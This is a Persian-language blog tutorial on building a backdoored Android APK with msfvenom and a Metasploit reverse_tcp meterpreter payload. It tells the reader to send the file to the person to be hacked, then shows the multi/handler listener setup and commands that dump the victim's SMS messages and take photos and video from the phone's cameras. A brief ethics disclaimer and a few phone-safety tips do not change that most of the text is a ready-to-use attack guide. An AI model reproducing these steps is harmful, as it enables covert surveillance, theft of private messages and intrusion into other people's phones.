هک گوشی با کالی لینوکس

هک گوشی با کالی لینوکس

هک اندروید با کالی لینوکس

ساخت فایل اجرایی و بکدور اندروید با استفاده از متاسپلویت

سلام خدمت همه علاقمندان به تست نفوذ اول از همه میگم که به این کار ها هک نمیگویند درواقع ایجاد بکدور میگویند چون پروسه هک پیچیده تر از این حرف هاست و این کار استفاده از برنامه ها و اسکریپت های هکر ها و برنامه نویس های دیگر برای نفوذ به یک سیستم است.

این سری درباره هک یا در واقع بکدور اندروید صحبت می کنیم…

هک به این صورت است که ما یک پیلود(کدی که در سیستم فرد مقابل اجرا میشود و به ما دسترسی میدهد)میسازیم که بصورت فایل apk برنامه های اندرویدی هست و به محض اینکه فرد مقابل برنامه را نصب و روی ان کلیک کند به ما دسترسی میدهد و یه جورایی میشه گفت هک می شود.

نکاتی در مورد امنیت موبایل ها:

تقریبا بیشتر موبایل های کاربران ایرانی از سیستم عامل اندروید استفاده میکند. تا الان سیستم عاملی نیامده است که نتوان ان را هک کرد.

این یعنی اگر فرد نکات امنیتی را رعایت نکند در هر سیستم عاملی میتواند هک شود. اندروید نفوذپزیر ترین سیستم عامل است و حتی با کلیک بر

روی لینک آلوده میتوان آن را هک کرد…

شاید هک به نظر خیلی ها کار خفن و جالبی باشد و واقعا هست ولی اگر از لحاظ غیر اخلاقی از ان استفاده کنید در واقع انسانیت و حریم خصوصی

را در مغز خود از بین برده اید…

نمیگم که این مطلب فقط جهت اگاهی افراد از نحوه هک و جلوگیری ان است ولی توصیه میکنم که دانسته و علم خود را افزایش دهید ولی

انسانیت را زیر پا نگزارید…

درواقع تکنولوژی برای راحت کردن کار انسان است نه اذیت کردن و از بین بردن حریم خصوصی…

نکاتی در مورد امنیت گوشی همراه که میتوانید با رعایت کردن آن از هک شدن جلوگیری کنید:

1: هر فایلی را نصب نکنید

فایل های برنامه ها و پکیج های اندروید با پسوند apk که از خیلی وبسایت ممکن است خودکار دانلود شود را اجرا نکنید…

برنامه ها را تا حد امکان از app store های معتبر دانلود و نصب کنید.

روی لینک های مشکوک با اسم های عجیب غریب کلیک نکنید.  چون به راحتی با اسفتاده از کد های جاوا اسکریپت که در مرورگر اجرا می شوند میتوان اول به مرورگر و از طریق آن به گوشی دسترسی پیدا کرد.

چندتا مطلب رو  بگم که مقدمه این هک هست اگر میخواید واقعا خودرا هکر بدانید باید بفهمید کدی که مینویسید چه کاری انجام میدهد…

ما دراین اموزش از سیستم عامل کالی لینوکس و فریمورک قدرتمند متاسپلویت استقاده میکنیم….

یه سری مفهوم رو باید برای انواع حملات و هک ها بلد باشید که عبارت است از:

LHOST = ای پی سیستم خودمون که در وبلاگ نحوه بدست اوردنش رو اموزش دادم:اینم لینکش:

LPORT = یک پورت (درگاه های ورودی و خروجی اطلاعات) دلخواه سیستم خودمون…4444 یا 444 خوبه…

RHOST= ای پی سیستم فرد مقابل…

RPORT=پورت های باز در سیستم فرد مقابل….اینهم ۴۴۴۴ یا ۴۴۴ خوبه…

ما در این اموزش فقط به LHOST و LPORT احتیاج داریم…

با دستور msfvenom که یک فایل مخرب میسازه شروع میکنیم…

این دستورات را در ترمینال کالی بنویسید….

msfvenom –p android/meterpreter/reverse_tcp LHOST=[your ip] LPORT=4444 o>[filename].apk

فقط بجای قسمت [your ip] ی پی خودتون و به جای [filename] اسم فایلی که میخواید بسازه رو بنویسید…

خب فایل رو ساخت….

حالا برنامه ای که ساخته رو برای کسی می خواید هک کنید بفرستید تا اون رو نصب کنه…

وبعد خودتون در ترمینال دستور زیر را بنویسید تا متاسپلویت به شکل کامندلاین (خط دستور) اجرا بشه…

msfconsole

خب حالا لازمه چند تا چیز رو بگم….

متاسپلویت یک فریمورک قدرتمند است برای تست نفوذ که انواع حملات را با ان میتوان انجام داد…

متاسپلویت از یکسسری اکسپلویت ( کد مخربی که با زبان روبی نوشته شده و دسترسی ایجاد میکنه) تشکیل شده که ما با ان ها می توانیم تست نفوذ انجام دهیم….

و می توانید اطلاعات بیشتر را در ویکی پدیا بدست اورید: ویکی پدیا متاسپلویت

متاسپلویت به جز اکسپلویت ها یکسری چیزهای دیگر مانند:

پیلود:payload

اکزلری:auxilary

پست ماژول:post

انکودر:encoder

ساخته شده است….

پیلود همونطور که گفتیم کدی است که در سیستم فرد مقابل اجرا می شود و دسترسی به ما می دهد…

برای اینکه بتوانیم از دسترسی استفاده کنیم به اکسپلویت احتیاج داریم که کمک می کند ما از دسترسی استفاده کنیم…

اگززلری هم کدی است که به اکسپلویت کمک می کند دسترسی بگیرد که معمولا برای کار هایی مانند اسکن پورت و … استفاده می شود.

پست ماژول هم کدی است که پس از اینکه دسترسی گرفتیم با ان می توانیم کارهای جالب و بیشتری در سیستم فرد مقابل انجام دهیم مانند تغییر تصویر زمینه،پخش صدا و ….

انکودر هم کدی است که از شناسایی پیلود توسط انتی ویروس ها جلوگیری می کند…

خب ما اینجا از اکسپلویت multi handler استفاده می کنیم که منتظر می ماند تا فرد روی پیلود یا همون فایل اجرایی کلیک کند و ان را اجرا کند و بعد به ما دسترسی می دهد…

این دسترسی دسترسی کامدلاینی هست یعنی ما با دستوراتی که وارد می کنیم کار هایی را در سیستم فرد مقابل انجام می دهیم…

که با فریمورک مترپرتر(meterpreter) امکان پزیر است…

خب شروع کنیم پس از اینکه متاسپلویت اجرا شد دستور زیر را می زنیم:

use exploit/multi/handler

که کلمه کلیدی use می گوید که می خوام از چیزی استفاده کنم…

exploit نشان می دهد که می خوایم از اکسپلویت استفاده کنیم و بعد اسم اکسپلویت….

همونطور که در عکس می بینید بعد از کلمه msf اسم اکسپلویت هم اضافه شده اگر نشده یک بار دیگر با دقت بزنید .

بعد دستور زیر رو بزنید که پیلود meterpreter/reverse_tcp را انتخاب میکند که برای انتخاب گزینه ها پس از انتخاب اکسپلویت از کلمه کلیدی set و نام گزینه و مقدار ان که الان گزینه ما payload و مقدار ان android/meterpreter/reverse_tcp می باشد استفاده میکنیم.

set payload android/meterpreter/reverse_tcp

خب حالا باید lhost و lport را انتخاب کنیم پس می نویسیم:

set lhost [your ip]

set lport 4444

که به جای ip ای پی خودتون رو بنویسید…. بعد با دستور show options یا options نگاه می کنیم گزینه های اکسپلویت و پیلود به درستی انتخاب شده باشند اگر هیچی نشان نداد بدانید که اشتباه انتخاب کردید و از اول دستورات را کپی پیست کنید…. تا درست بشه… و بعد با دستور run یا exploit اکسپویت را اجرا میکنیم…

و منتظر می مانیم که فرد روی پیلود کلیک کند….

خب حالا که کلمه meterpreter و کامندلاینش ظاهر شد می توانیم دستورات را در گوشی هک شده اجرا کنیم…

مانند:

گرفتن تمام اس ام اس ها در یک فایل txt:

dump_sms –o sms.txt

عکس گرفتن از دوربین جلو و عقب به ترتیب:

webcam_snap  –i 2

webcam_snap  –i 1

گرفتن فیلم از دوربین:

webcam_stream 1

webcam_stream 2

پخس اهنگ از سیستم خودتون به گوشی تارگت:

play [file directory]

*در دستور بالا به جای file directory مسیر اهنگ مورد نظر را بنویسید تا اهنگ پخش بشود.

و برای دیدن دستورات دیگر علامت سوال را تایپ کنید تا دستورات دیگر نمایش داده شوند.

در ضمن اگر در هنگام اجرا کردن پیلود در گوشی با ارور مواجه شدید ایراد از set کردن پیلود بود و یبار با دقت تمام payload رو set کنید.

نظر یادتون نره….

هک اندروید با کالی لینوکس

 

کنترل گوشی اندروید

هک و امنیت